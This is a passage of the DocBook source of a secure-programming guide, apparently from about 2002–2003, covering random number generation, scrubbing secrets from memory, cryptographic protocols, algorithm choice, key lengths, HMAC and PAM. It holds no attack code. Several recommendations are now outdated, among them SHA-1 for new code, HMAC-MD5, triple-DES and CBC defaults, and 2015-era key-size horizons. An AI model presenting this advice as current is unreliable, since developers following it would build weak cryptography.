Solaris users with the SUNWski package also have /dev/random.
|
||
Note that if a hardware random number generator is available and its
|
||
driver is installed, it will be used instead.
|
||
More information is available in the system documentation random(4).
|
||
</para>
|
||
|
||
<para>
|
||
On other systems, you'll need to find another way to get truly random results.
|
||
One possibility for other Unix-like systems
|
||
is the Entropy Gathering Daemon (EGD), which monitors system
|
||
activity and hashes it into random values; you can get it at
|
||
<ulink url="http://www.lothar.com/tech/crypto">http://www.lothar.com/tech/crypto</ulink>.
|
||
You might consider using a
|
||
cryptographic hash functions (e.g., SHA-1) on PRNG outputs.
|
||
By using a hash algorithm, even if the PRNG turns out to be guessable,
|
||
this means that the attacker must now also break the hash function.
|
||
</para>
|
||
|
||
<para>
|
||
If you have to implement a strong PRNG yourself,
|
||
a good choice for a cryptographically strong (and patent-unencumbered)
|
||
PRNG is the Yarrow algorithm; you can learn more about Yarrow from
|
||
<ulink url="http://www.counterpane.com/yarrow.html">http://www.counterpane.com/yarrow.html</ulink>.
|
||
Some other PRNGs can be useful, but many widely-used ones
|
||
have known weaknesses that may or may not matter depending on your application.
|
||
Before implementing a PRNG yourself, consult the literature, such as
|
||
[Kelsey 1998] and [McGraw 2000a].
|
||
You should also examine
|
||
<ulink url="http://www.ietf.org/rfc/rfc1750.txt">IETF RFC 1750</ulink>.
|
||
NIST has some useful information; see the
|
||
<ulink url="http://csrc.nist.gov/publications/nistpubs/800-22/sp-800-22-051501.pdf">NIST publication 800-22</ulink> and
|
||
<ulink url="http://csrc.nist.gov/publications/nistpubs/800-22/errata-sheet.pdf">NIST errata</ulink>.
|
||
You should know about the
|
||
<ulink url="http://stat.fsu.edu/~geo/diehard.html">diehard tests</ulink> too.
|
||
You might want to examine
|
||
the paper titled
|
||
<!-- http://www.cryptonomicon.net/links.php?op=visit&lid=406 -->
|
||
"how Intel checked its PRNG", but unfortunately that paper appears to be
|
||
unavailable now.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="protect-secrets">
|
||
<title>Specially Protect Secrets (Passwords and Keys) in User Memory</title>
|
||
<para>
|
||
If your application must handle passwords or non-public keys
|
||
(such as session keys, private keys, or secret keys), try to hide them
|
||
and overwrite them immediately after using them so they have minimal exposure.
|
||
</para>
|
||
|
||
<para>
|
||
Systems such as Linux support the mlock() and mlockall() calls to
|
||
keep memory from being paged to disk (since someone might acquire the
|
||
kep later from the swap file).
|
||
Note that on Linux this is a privileged system call, which causes its
|
||
own issues (do I grant the program superuser privileges so it can call
|
||
mlock, if it doesn't need them otherwise?).
|
||
</para>
|
||
|
||
<para>
|
||
Also, if your program handles such secret values, be sure to disable creating
|
||
core dumps (via ulimit). Otherwise, an attacker may be able to halt the
|
||
program and find the secret value in the data dump.
|
||
</para>
|
||
|
||
<para>
|
||
Beware - normally processes can monitor other processes through
|
||
the calls for debuggers (e.g., via ptrace(2) and the /proc pseudo-filesystem)
|
||
[Venema 1996]
|
||
Kernels usually protect against these monitoring routines if the process is
|
||
setuid or setgid
|
||
(on the few ancient ones that don't, there really isn't a good way to
|
||
defend yourself other than upgrading).
|
||
Thus, if your process manages secret values, you probably should make it
|
||
setgid or setuid (to a different unprivileged group or user) to forceably
|
||
inhibit this kind of monitoring.
|
||
Unless you need it to be setuid, use setgid (since this grants fewer
|
||
privileges).
|
||
</para>
|
||
|
||
|
||
<para>
|
||
Then there's the problem of being able to actually overwrite the value, which
|
||
often becomes language and compiler specific.
|
||
In many languages, you need to make sure that you store
|
||
such information in mutable locations, and then overwrite those locations.
|
||
For example,
|
||
in Java, don't use the type String to store a password because Strings are
|
||
immutable (they will not be overwritten until garbage-collected and
|
||
then reused, possibly a far time in the future).
|
||
Instead, in Java use char[] to store a password, so it can be
|
||
immediately overwritten.
|
||
In Ada, use type String (an array of characters),
|
||
and not type Unbounded_String, to make sure
|
||
that you have control over the contents.
|
||
</para>
|
||
|
||
<para>
|
||
In many languages (including C and C++),
|
||
be careful that the compiler doesn't optimize away the "dead code"
|
||
for overwriting the value - since in this case it's not dead code.
|
||
Many compilers, including many C/C++ compilers, remove writes
|
||
to stores that are no longer used - this is often referred to as
|
||
"dead store removal."
|
||
Unfortunately, if the write is really to overwrite the value of a secret,
|
||
this means that code that appears to be correct will be silently discareded.
|
||
Ada provides the pragma Inspection_Point; place this after the
|
||
code erasing the memory, and that way you can be certain that
|
||
the object containing the secret will really be erased
|
||
(and that the overwriting won't be optimized away).
|
||
</para>
|
||
|
||
<para>
|
||
<!-- "When scrubbing secrets doesn't work" discusses this in Bugtraq
|
||
November 2002, but this is actually a really old issue that keeps
|
||
re-surfacing.
|
||
-->
|
||
A Bugtraq post by Andy Polyakov (November 7, 2002) reported that
|
||
the C/C++ compilers gcc version 3 or higher, SGI MIPSpro, and the Microsoft
|
||
compilers eliminated simple inlined calls to memset
|
||
intended to overwrite secrets.
|
||
This is allowed by the C and C++ standards.
|
||
Other C/C++ compilers (such as gcc less than version 3) preserved the inlined
|
||
call to memset at all optimization levels, showing that the issue
|
||
is compiler-specific.
|
||
Simply declaring that the destination data is volatile doesn't
|
||
help on all compilers; both the MIPSpro and Microsoft compilers
|
||
ignored simple "volatilization".
|
||
Simply "touching" the first byte of the secret data doesn't help either;
|
||
he found that the MIPSpro and GCC>=3 cleverly nullify only the first byte
|
||
and leave the rest intact (which is actually quite clever - the problem
|
||
is that the compiler's cleverness is interfering with our goals).
|
||
One approach that
|
||
seems to work on all platforms is to
|
||
write your own implementation of memset with internal "volatilization"
|
||
of the first argument (this code is based on a
|
||
<ulink url="http://online.securityfocus.com/archive/82/298061/2002-10-27/2002-11-02/0">workaround proposed by Michael Howard</ulink>):
|
||
<programlisting>
|
||
void *guaranteed_memset(void *v,int c,size_t n)
|
||
{ volatile char *p=v; while (n--) *p++=c; return v; }
|
||
</programlisting>
|
||
Then place this definition into an external file to force the function to
|
||
be external (define the function in a corresponding .h file, and #include
|
||
the file in the callers, as is usual).
|
||
This approach appears to be safe
|
||
at any optimization level (even if the function gets inlined).
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="crypto">
|
||
<title>Cryptographic Algorithms and Protocols</title>
|
||
|
||
<para>
|
||
Often cryptographic algorithms and protocols are necessary to keep
|
||
a system secure, particularly when communicating through an untrusted
|
||
network such as the Internet.
|
||
Where possible, use cryptographic techniques to authenticate information and
|
||
keep the information private
|
||
(but don't assume that simple encryption automatically authenticates as well).
|
||
Generally you'll need to use a suite of available tools to
|
||
secure your application.
|
||
</para>
|
||
|
||
<para>
|
||
For background information and code, you should probably look at
|
||
the classic text ``Applied Cryptography'' [Schneier 1996].
|
||
The newsgroup ``sci.crypt'' has a series of FAQ's; you can find them
|
||
at many locations, including
|
||
<ulink url="http://www.landfield.com/faqs/cryptography-faq">http://www.landfield.com/faqs/cryptography-faq</ulink>.
|
||
Linux-specific resources include the Linux Encryption HOWTO at
|
||
<ulink
|
||
url="http://marc.mutz.com/Encryption-HOWTO/">http://marc.mutz.com/Encryption-HOWTO/</ulink>.
|
||
A discussion on how protocols use the basic algorithms can be
|
||
found in [Opplinger 1998].
|
||
A useful collection of papers on how to apply cryptography in
|
||
protocols can be found in [Stallings 1996].
|
||
What follows here is just a few comments; these areas are rather
|
||
specialized and covered more thoroughly elsewhere.
|
||
</para>
|
||
|
||
<para>
|
||
Cryptographic protocols and algorithms are difficult to get right,
|
||
so do not create your own.
|
||
Instead, where you can, use protocols and algorithms that are
|
||
widely-used, heavily analyzed, and accepted as secure.
|
||
When you must create anything, give the approach wide public review and
|
||
make sure that professional security analysts examine it for problems.
|
||
In particular, do not create your own encryption algorithms unless you are
|
||
an expert in cryptology, know what you're doing, and plan to spend
|
||
years in professional review of the algorithm.
|
||
Creating encryption algorithms (that are any good) is a task for experts only.
|
||
</para>
|
||
|
||
|
||
<para>
|
||
A number of algorithms are patented; even if the owners permit
|
||
``free use'' at the moment, without a signed contract they can always
|
||
change their minds later, putting you at extreme risk later.
|
||
In general, avoid all patented algorithms -
|
||
in most cases there's an unpatented approach that is at least as good
|
||
or better technically, and by doing so you avoid a large number
|
||
of legal problems.
|
||
</para>
|
||
|
||
<para>
|
||
Another complication is that many counties regulate or restrict
|
||
cryptography in some way.
|
||
A survey of legal issues is available at the ``Crypto Law Survey'' site,
|
||
<ulink url="http://rechten.kub.nl/koops/cryptolaw/">http://rechten.kub.nl/koops/cryptolaw/</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
Often, your software should provide a way to
|
||
reject ``too small'' keys, and let the user set what ``too small'' is.
|
||
For RSA keys, 512 bits is too small for use.
|
||
There is increasing evidence that
|
||
1024 bits for RSA keys is not enough either;
|
||
Bernstein has suggested techniques that simplify brute-forcing RSA, and
|
||
other work based on it
|
||
(such as Shamir and Tromer's "Factoring Large Numbers with the TWIRL device")
|
||
now suggests that 1024 bit keys can be broken in a year
|
||
by a $10 Million device.
|
||
You may want to
|
||
make 2048 bits the minimum for RSA if you really want a secure system,
|
||
and you should certainly do so if you plan to use those keys after 2015.
|
||
For more about RSA specifically, see
|
||
<ulink url="http://www.rsasecurity.com/rsalabs/technotes/bernstein.html">RSA's
|
||
commentary on Bernstein's work</ulink>.
|
||
For a more general discussion of key length and other general
|
||
cryptographic algorithm issues, see
|
||
<ulink url="http://csrc.nist.gov/encryption/kms/key-management-guideline-(workshop).pdf">NIST's key management workshop in November 2001</ulink>.
|
||
</para>
|
||
|
||
<sect2 id="crypto-protocols">
|
||
<title>Cryptographic Protocols</title>
|
||
|
||
<para>
|
||
When you need a security protocol, try to use standard-conforming protocols
|
||
such as IPSec, SSL (soon to be TLS), SSH, S/MIME, OpenPGP/GnuPG/PGP,
|
||
and Kerberos.
|
||
Each has advantages and disadvantages;
|
||
many of them overlap somewhat in functionality, but each tends to be
|
||
used in different areas:
|
||
|
||
<itemizedlist>
|
||
<listitem>
|
||
<para>
|
||
Internet Protocol Security (IPSec).
|
||
IPSec provides encryption and/or authentication at the IP packet level.
|
||
However, IPSec is often used in a way that
|
||
only guarantees authenticity of two
|
||
communicating hosts, not of the users.
|
||
As a practical matter, IPSec usually requires low-level support
|
||
from the operating system (which not all implement) and
|
||
an additional keyring server that must be configured.
|
||
Since IPSec can be used as a "tunnel" to secure packets belonging to
|
||
multiple users and multiple hosts, it is especially useful for
|
||
building a Virtual Private Network (VPN) and connecting a remote machine.
|
||
As of this time, it is much less often used to secure communication
|
||
from individual clients to servers.
|
||
The new version of the Internet Protocol, IPv6, comes with
|
||
IPSec ``built in,'' but IPSec also works with the more common IPv4 protocol.
|
||
Note that if you use IPSec, don't use the encryption mode without the
|
||
authentication, because the authentication also acts as
|
||
integrity protection.
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
Secure Socket Layer (SSL) / TLS.
|
||
SSL/TLS works over TCP and tunnels other protocols using TCP, adding
|
||
encryption, authentication of the server, and optional authentication
|
||
of the client (but authenticating clients using SSL/TLS requires
|
||
that clients have configured X.509 client certificates, something
|
||
rarely done).
|
||
SSL version 3 is widely used; TLS is a later adjustment to SSL that
|
||
strengthens its security and improves its flexibility.
|
||
Currently there is a slow transition going on from SSLv3 to TLS, aided
|
||
because implementations can easily try to use TLS and then back off to SSLv3
|
||
without user intervention.
|
||
Unfortunately, a few bad SSLv3 implementations cause problems with the
|
||
backoff, so you may need a preferences setting to allow users to skip
|
||
using TLS if necessary.
|
||
Don't use SSL version 2, it has some serious security weaknesses.
|
||
</para>
|
||
<para>
|
||
SSL/TLS is the primary method for protecting http (web) transactions.
|
||
Any time you use an "https://" URL, you're using SSL/TLS.
|
||
Other protocols that often use SSL/TLS include POP3 and IMAP.
|
||
SSL/TLS usually use a separate TCP/IP port
|
||
number from the unsecured port, which the IETF is a little unhappy about
|
||
(because it consumes twice as many ports; there are solutions to this).
|
||
SSL is relatively easy to use in programs, because
|
||
most library implementations allow programmers to use operations
|
||
similar to the operations on standard sockets like
|
||
SSL_connect(), SSL_write(), SSL_read(), etc.
|
||
A widely used OSS/FS implementation of SSL (as well as other capabilities)
|
||
is OpenSSL, available at
|
||
<ulink url="http://www.openssl.org">http://www.openssl.org</ulink>.
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
OpenPGP and S/MIME.
|
||
There are two competing, essentially incompatible standards for
|
||
securing email: OpenPGP and S/MIME.
|
||
OpenPHP is based on the PGP application; an OSS/FS implementation is
|
||
GNU Privacy Guard from
|
||
<ulink url="http://www.gnupg.org">http://www.gnupg.org</ulink>.
|
||
Currently, their certificates are often not interchangeable;
|
||
work is ongoing to repair this.
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
SSH.
|
||
SSH is the primary method of securing ``remote terminals'' over an
|
||
internet, and it also includes methods for
|
||
tunelling X Windows sessions.
|
||
However, it's been extended to support single sign-on and
|
||
general secure tunelling for TCP streams, so it's often
|
||
used for securing other data streams too (such as CVS accesses).
|
||
The most popular implementation of SSH is OpenSSH
|
||
<ulink url="http://www.openssh.com">http://www.openssh.com</ulink>,
|
||
which is OSS/FS.
|
||
Typical uses of SSH allows the client to authenticate that the
|
||
server is truly the server, and
|
||
then the user enters a password to authenticate the user
|
||
(the password is encrypted and sent to the other system for verification).
|
||
Current versions of SSH can store private keys, allowing users to not
|
||
enter the password each time.
|
||
To prevent man-in-the-middle attacks, SSH records keying information
|
||
about servers it talks to; that means that typical use of
|
||
SSH is vulnerable to a man-in-the-middle attack during the
|
||
very first connection, but it can detect problems afterwards.
|
||
In contrast, SSL generally uses a certificate authority, which eliminates
|
||
the first connection problem but requires special setup (and payment!) to
|
||
the certificate authority.
|
||
</para>
|
||
</listitem>
|
||
|
||
|
||
<listitem>
|
||
<para>
|
||
Kerberos.
|
||
Kerberos is a protocol for single sign-on and authenticating users
|
||
against a central authentication and key distribution server. Kerberos
|
||
works by giving authenticated users "tickets", granting them access to
|
||
various services on the network.
|
||
When clients then contact servers, the servers can verify the tickets.
|
||
Kerberos is a primary method for securing and supporting authentication
|
||
on a LAN, and for establishing shared secrets (thus, it needs to be
|
||
used with other algorithms for the actual protection of communication).
|
||
Note that to use Kerberos, both the client and server have to include
|
||
code to use it, and since not everyone has a Kerberos setup, this has
|
||
to be optional - complicating the use of Kerberos in some programs.
|
||
However, Kerberos is widely used.
|
||
</para>
|
||
</listitem>
|
||
|
||
</itemizedlist>
|
||
</para>
|
||
|
||
|
||
|
||
<para>
|
||
Many of these protocols allow you to select a number of different
|
||
algorithms, so you'll still need to pick reasonable defaults for
|
||
algorithms (e.g., for encryption).
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="symmetric-encryption">
|
||
<title>Symmetric Key Encryption Algorithms</title>
|
||
|
||
<para>
|
||
The use, export, and/or import of implementations of
|
||
encryption algorithms are restricted in many countries, and the laws
|
||
can change quite rapidly.
|
||
Find out what the rules are before trying to build applications using
|
||
cryptography.
|
||
</para>
|
||
|
||
<para>
|
||
For secret key (bulk data) encryption algorithms,
|
||
use only encryption algorithms that have been openly published and withstood
|
||
years of attack, and check on their patent status.
|
||
I would recommend using the
|
||
new Advanced Encryption Standard (AES), also known as Rijndahl --
|
||
a number of cryptographers have analyzed it and not found any serious weakness
|
||
in it, and I believe it has been through enough analysis
|
||
to be trustworthy now.
|
||
However, in August 2002
|
||
researchers Fuller and Millar
|
||
discovered a mathematical property of the cipher that,
|
||
while not an attack, might be exploitable into an attack
|
||
(the approach may actually has serious consequences for some other
|
||
algorithms, too).
|
||
Thus, it's worth staying tuned to future work.
|
||
<!--
|
||
AES property - Abstract is here:
|
||
http://eprint.iacr.org/2002/111/
|
||
Full report (postscript) written by Fuller, J, & Millar, M. (Aug, 2002):
|
||
http://eprint.iacr.org/2002/111.ps
|
||
-->
|
||
A good alternative to AES is the Serpent algorithm, which is slightly slower
|
||
but is very resistant to attack.
|
||
For many applications triple-DES is a very good encryption algorithm; it
|
||
has a reasonably lengthy key (112 bits), no patent issues, and
|
||
a very long history of withstanding attacks (it's withstood attacks far
|
||
longer than any other encryption algorithm with reasonable key length in the
|
||
public literature, so it's probably the safest publicly-available
|
||
symmetric encryption algorithm when properly implemented).
|
||
However, triple-DES is very slow when implemented in software, so
|
||
triple-DES can be considered ``safest but slowest.''
|
||
Twofish appears to be a good encryption algorithm, but there are some
|
||
lingering questions - Sean Murphy and Fauzan Mirza showed that Twofish
|
||
has properties that cause many academics to be concerned (though as of yet
|
||
no one has managed to exploit these properties).
|
||
MARS is highly resistent to ``new and novel'' attacks, but it's more complex
|
||
and is impractical on small-ability smartcards.
|
||
For the moment I would avoid Twofish - it's quite likely that this will never
|
||
be exploitable, but it's hard to be sure and there are alternative
|
||
algorithms which don't have these concerns.
|
||
Don't use IDEA - it's subject to U.S. and European patents.
|
||
Don't use stupid algorithms such as XOR with a constant or constant string,
|
||
the ROT (rotation)
|
||
scheme, a Vinegere ciphers, and so on - these can be trivially broken
|
||
with today's computers.
|
||
Don't use ``double DES'' (using DES twice) - that's subject to a
|
||
``man in the middle'' attack that triple-DES avoids.
|
||
Your protocol should support multiple encryption algorithms, anyway;
|
||
that way, when an encryption algorithm is broken,
|
||
users can switch to another one.
|
||
</para>
|
||
|
||
<para>
|
||
For symmetric-key encryption (e.g., for bulk encryption), don't use a
|
||
key length less than 90 bits if you want the information
|
||
to stay secret through 2016
|
||
(add another bit for every additional 18 months of security) [Blaze 1996].
|
||
For encrypting worthless data, the old DES algorithm has some value,
|
||
but with modern hardware it's too easy to break DES's 56-bit key using
|
||
brute force.
|
||
If you're using DES, don't just use the ASCII text key as the key -
|
||
parity is in the least (not most) significant bit, so most DES algorithms
|
||
will encrypt using a key value well-known to adversaries;
|
||
instead, create a hash of the key and set the parity bits correctly
|
||
(and pay attention to error reports from your encryption routine).
|
||
So-called ``exportable'' encryption algorithms only have effective key lengths
|
||
of 40 bits, and are essentially worthless;
|
||
in 1996 an attacker could spend $10,000 to break such keys in twelve minutes
|
||
or use idle computer time to break them in a few days,
|
||
with the time-to-break halving every 18 months in either case.
|
||
</para>
|
||
|
||
<para>
|
||
Block encryption algorithms can be used in a number of different modes, such as
|
||
``electronic code book'' (ECB) and ``cipher block chaining'' (CBC).
|
||
In nearly all cases, use CBC, and do <emphasis>not</emphasis> use ECB mode -
|
||
in ECB mode, the same block of data always returns the same result inside
|
||
a stream, and this is often enough to reveal what's encrypted.
|
||
Many modes, including CBC mode, require an ``initialization vector'' (IV).
|
||
The IV doesn't need to be secret, but it does need to be unpredictable by
|
||
an attacker.
|
||
Don't reuse IV's across sessions - use a new IV each time you start a session.
|
||
</para>
|
||
|
||
<para>
|
||
There are a number of different streaming encryption algorithms, but
|
||
many of them have patent restrictions.
|
||
I know of no patent or technical issues with WAKE.
|
||
RC4 was a trade secret of RSA Data Security Inc; it's been leaked since,
|
||
and I know of no real legal impediment to its use, but RSA Data
|
||
Security has often threatened
|
||
court action against users of it (it's not at all clear what RSA Data
|
||
Security could do,
|
||
but no doubt they could tie up users in worthless court cases).
|
||
If you use RC4, use it as intended - in particular, always discard the
|
||
first 256 bytes it generates, or you'll be vulnerable to attack.
|
||
<!-- Fluhrer, Mantin, Shamir discuss attacks if 256 bytes not dropped -->
|
||
SEAL is patented by IBM - so don't use it.
|
||
SOBER is patented; the patent owner has claimed that it will allow many
|
||
uses for free if permission is requested, but this creates an impediment for
|
||
later use.
|
||
Even more interestingly, block encryption algorithms can be used in modes that
|
||
turn them into stream ciphers, and users who want stream ciphers should
|
||
consider this approach (you'll be able to choose between far more
|
||
publicly-available algorithms).
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
|
||
<sect2 id="public-key-encryption">
|
||
<title>Public Key Algorithms</title>
|
||
|
||
<para>
|
||
For public key cryptography (used, among other things, for
|
||
signing and sending secret keys), there are only a few
|
||
widely-deployed algorithms.
|
||
One of the most widely-used algorithms is RSA;
|
||
RSA's algorithm was patented, but only in the U.S., and that patent
|
||
expired in September 2000, so RSA can be freely used.
|
||
Never decrypt or sign a raw value that an attacker gives you directly using
|
||
RSA and expose the result, because that could expose the private key
|
||
(this isn't a problem in practice, because most protocols involve
|
||
signing a hash computed by the user - not the raw value - or don't expose
|
||
the result).
|
||
Never decrypt or sign the exact same raw value multiple times
|
||
(the original can be exposed).
|
||
Both of these can be solved by always adding random padding
|
||
(PGP does this) - the usual approach is called
|
||
Optimal Asymmetric Encryption Padding (OAEP).
|
||
</para>
|
||
|
||
<para>
|
||
The Diffie-Hellman key exchange algorithm is widely used to permit
|
||
two parties to agree on a session key. By itself it doesn't guarantee that
|
||
the parties are who they say they are, or that there is no middleman, but
|
||
it does strongly help defend against passive listeners; its patent
|
||
expired in 1997.
|
||
If you use Diffie-Hellman to create a shared secret, be sure to hash it first
|
||
(there's an attack if you use its shared value directly).
|
||
</para>
|
||
|
||
<para>
|
||
NIST developed the digital signature standard (DSS) (it's a
|
||
modification of the ElGamal cryptosystem) for digital signature
|
||
generation and verification; one of the conditions for its development
|
||
was for it to be patent-free.
|
||
</para>
|
||
|
||
<para>
|
||
RSA, Diffie-Hellman, and El Gamal's techniques require more bits for the
|
||
keys for equivalent security compared to typical symmetric keys;
|
||
a 1024-bit key in these systems is supposed to be roughly equivalent
|
||
to an 80-bit symmetric key.
|
||
A 512-bit RSA key is considered completely unsafe;
|
||
Nicko van Someren has demonstrated that such small RSA keys
|
||
can be factored in 6 weeks using only already-available office hardware
|
||
(never mind equipment designed for the job).
|
||
<!-- http://www.mail-archive.com/cryptography%40wasabisystems.com/msg01950.html -->
|
||
In the past, a 1024-bit RSA key was considered reasonably secure, but
|
||
recent advancements in factorization algorithms
|
||
(e.g., by D. J. Bernstein) have raised concerns that perhaps even 1024 bits
|
||
is not enough for an RSA key.
|
||
Certainly, if your application needs to be highly secure or last beyond
|
||
2015, you should use a 2048 bit keys.
|
||
<!--
|
||
"1024-bit RSA keys in danger of compromise" by
|
||
"Lucky Green" <shamrock@cypherpunks.to>, Bugtraq, 23 March 2002.
|
||
D.J. Bernstein paper http://cr.yp.to/papers/nfscircuit.ps
|
||
Bruce Schneier doubts it, see
|
||
http://www.counterpane.com/crypto-gram-0203.html#6
|
||
-->
|
||
</para>
|
||
|
||
<para>
|
||
If you need a public key that requires far fewer bits (e.g., for
|
||
a smartcard), then you might use elliptic
|
||
curve cryptography (IEEE P1363 has some suggested curves; finding curves
|
||
is hard).
|
||
However, be careful - elliptic curve cryptography isn't patented, but
|
||
certain speedup techniques are patented.
|
||
Elliptic curve cryptography is fast enough
|
||
that it really doesn't need these speedups anyway for its usual use of
|
||
encrypting session / bulk encryption keys.
|
||
In general, you shouldn't try to do bulk encryption with elliptic keys;
|
||
symmetric algorithms are much faster and are better-tested for the job.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="hash">
|
||
<title>Cryptographic Hash Algorithms</title>
|
||
|
||
<para>
|
||
Some programs need a one-way cryptographic hash algorithm, that is, a function
|
||
that takes an ``arbitrary'' amount of data and generates a fixed-length
|
||
number that hard for an attacker
|
||
to invert (e.g., it's difficult for an attacker to
|
||
create a different set of data to generate that same value).
|
||
For a number of years MD5 has been a favorite, but recent efforts have
|
||
shown that its 128-bit length may not be enough
|
||
[van Oorschot 1994]
|
||
and that certain attacks weaken MD5's protection
|
||
[Dobbertin 1996].
|
||
Indeed, there are rumors
|
||
that a top industry cryptographer has broken MD5, but is bound by
|
||
employee agreement to keep silent
|
||
(see the Bugtraq 22 August 2000 posting by John Viega).
|
||
Anyone can create a rumor, but enough weaknesses have been found that
|
||
the idea of completing the break is plausible.
|
||
If you're writing new code, use SHA-1 instead of MD5.
|
||
Don't use the original SHA (now called ``SHA-0'');
|
||
SHA-0 had the same weakness that MD5 does.
|
||
If you need more bits in your hash algorithm, use SHA-256, SHA-384, or
|
||
SHA-512; you can get the specifications in NIST FIPS PUB 180-2.
|
||
</para>
|
||
</sect2>
|
||
|
||
<sect2 id="integrity-check">
|
||
<title>Integrity Checking</title>
|
||
|
||
<para>
|
||
When communicating, you need some sort of integrity check (don't depend
|
||
just on encryption, since an attacker can then induce changes of information
|
||
to ``random'' values).
|
||
This can be done with hash algorithms, but don't just use a hash function
|
||
directly (this exposes users to an ``extension'' attack - the attacker
|
||
can use the hash value, add data of their choosing, and compute the new hash).
|
||
The usual approach is ``HMAC'', which computes the integrity check as
|
||
<programlisting>
|
||
H(k xor opad, H(k xor ipad, data)).
|
||
</programlisting>
|
||
where H is the hash function (typically MD5 or SHA-1) and k is the key.
|
||
Thus, integrity checks are often HMAC-MD5 or HMAC-SHA-1.
|
||
Note that although MD5 has some weaknesses, as far as I know MD5 isn't
|
||
vulnerable when used in this construct, so HMAC-MD5 is (to my knowledge) okay.
|
||
This is defined in detail in IETF RFC 2104.
|
||
</para>
|
||
|
||
<para>
|
||
Note that in the HMAC approach, a receiver can forge the same data as a sender.
|
||
This isn't usually a problem, but if this must be avoided, then use
|
||
public key methods and have the sender ``sign'' the data with the sender
|
||
private key - this avoids this forging attack, but it's more expensive and
|
||
for most environments isn't necessary.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="rmac">
|
||
<title>Randomized Message Authentication Mode (RMAC)</title>
|
||
|
||
<para>
|
||
<ulink url="http://csrc.nist.gov/CryptoToolkit/modes">
|
||
NIST has developed and proposed
|
||
a new mode</ulink> for using cryptographic algorithms called
|
||
<ulink url="http://www.counterpane.com/crypto-gram-0301.html">
|
||
Randomized Message Authentication Code (RMAC)</ulink>.
|
||
RMAC is intended for use as a message authentication code technique.
|
||
</para>
|
||
|
||
<para>
|
||
Although there's a formal proof showing that RMAC is secure, the
|
||
proof depends on the highly questionable assumption that
|
||
the underlying cryptographic algorithm
|
||
meets the "ideal cipher model" - in particular, that the algorithm is
|
||
secure against a variety of specialized attacks, including related-key attacks.
|
||
Unfortunately, related-key attacks are poorly studied for many algorithms;
|
||
this is not the kind of property or attack that most people worry about
|
||
when analyzing with cryptographic algorithms.
|
||
It's known triple-DES doesn't have this properly, and it's unclear if
|
||
other widely-accepted algorithms like AES have this property
|
||
(it appears that AES is at least weaker against related key attacks than
|
||
usual attacks).
|
||
</para>
|
||
|
||
<para>
|
||
The best advice right now is "don't use RMAC".
|
||
There are other ways to do message authentication, such as HMAC
|
||
combined with a cryptographic hash algorithm (e.g., HMAC-SHA1).
|
||
HMAC isn't the same thing (e.g., technically it doesn't include a
|
||
nonce, so you should rekey sooner), but the theoretical weaknesses
|
||
of HMAC are merely theoretical, while the problems in RMAC seem far
|
||
more important in the real world.
|
||
</para>
|
||
</sect2>
|
||
|
||
<sect2 id="crypto-other">
|
||
<title>Other Cryptographic Issues</title>
|
||
|
||
<para>
|
||
You should both encrypt and include integrity checks of data that's important.
|
||
Don't depend on the encryption also providing integrity - an attacker may
|
||
be able to change the bits into a different value, and although the attacker
|
||
may not be able to change it to a specific value, merely changing the
|
||
value may be enough.
|
||
In general, you should use different keys for integrity and secrecy, to
|
||
avoid certain subtle attacks.
|
||
</para>
|
||
|
||
<para>
|
||
One issue not discussed often enough is the problem of ``traffic analysis.''
|
||
That is, even if messages are encrypted and the encryption is not broken,
|
||
an adversary may learn a great deal just from the encrypted messages.
|
||
For example, if the presidents of two companies start exchanging many
|
||
encrypted email messages, it may suggest that the two comparies are
|
||
considering a merger.
|
||
For another example, many SSH implementations have been found to have a
|
||
weakness in exchanging passwords: observers could look at packets and
|
||
determine the length (or length range) of the password, even if they
|
||
couldn't determine the password itself.
|
||
They could also determine other information about the password that
|
||
significantly aided in breaking it.
|
||
<!-- http://lwn.net/2001/0322/a/ssh-analysis.php3 -->
|
||
</para>
|
||
|
||
<para>
|
||
Be sure to not make it possible to solve a problem in parts, and use
|
||
different keys when the trust environment (who is trusted) changes.
|
||
Don't use the same key for too long - after a while, change the session key
|
||
or password so an adversary will have to start over.
|
||
</para>
|
||
|
||
<para>
|
||
Generally you should compress something you'll encrypt - this does
|
||
add a fixed header, which isn't so good, but it eliminates many
|
||
patterns in the rest of the message as well as making the result
|
||
smaller, so it's usually viewed as a ``win'' if compression is likely
|
||
to make the result smaller.
|
||
</para>
|
||
|
||
<para>
|
||
In a related note, if you must create your own communication
|
||
protocol, examine the problems of what's gone on before.
|
||
Classics such as Bellovin [1989]'s review of security problems
|
||
in the TCP/IP protocol suite might help you, as well as
|
||
Bruce Schneier [1998]
|
||
and Mudge's breaking of Microsoft's PPTP implementation and their
|
||
follow-on work.
|
||
Again, be sure to give any new protocol widespread public review, and
|
||
reuse what you can.
|
||
</para>
|
||
</sect2>
|
||
|
||
</sect1>
|
||
|
||
|
||
<sect1 id="use-pam">
|
||
<title>Using PAM</title>
|
||
|
||
<para>
|
||
Pluggable Authentication Modules (PAM) is
|
||
a flexible mechanism for authenticating users.
|
||
Many Unix-like systems support PAM, including
|
||
Solaris, nearly all Linux distributions
|
||
(e.g., Red Hat Linux, Caldera, and Debian as of version 2.2),
|
||
and FreeBSD as of version 3.1.
|
||
By using PAM, your program can be independent of the
|
||
authentication scheme (passwords, SmartCards, etc.).
|
||
Basically, your program calls PAM, which at run-time determines
|
||
which ``authentication modules'' are required by checking the configuration
|
||
set by the local system administrator.
|
||
If you're writing a program that requires authentication (e.g., entering
|
||
a password), you should include support for PAM.
|
||
You can find out more about the Linux-PAM project at
|
||
<ulink
|
||
url="http://www.kernel.org/pub/linux/libs/pam/index.html">http://www.kernel.org/pub/linux/libs/pam/index.html</ulink>.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
|
||
<sect1 id="tools">
|
||
<title>Tools</title>
|
||
|
||
<para>
|
||
Some tools may help you detect security problems before
|
||
you field the result.
|
||
They can't find all such problems, of course, but they can help
|
||
catch problems that would overwise slip by.
|
||
Here are a few tools, emphasizing open source / free software tools.
|
||
</para>
|
||
|
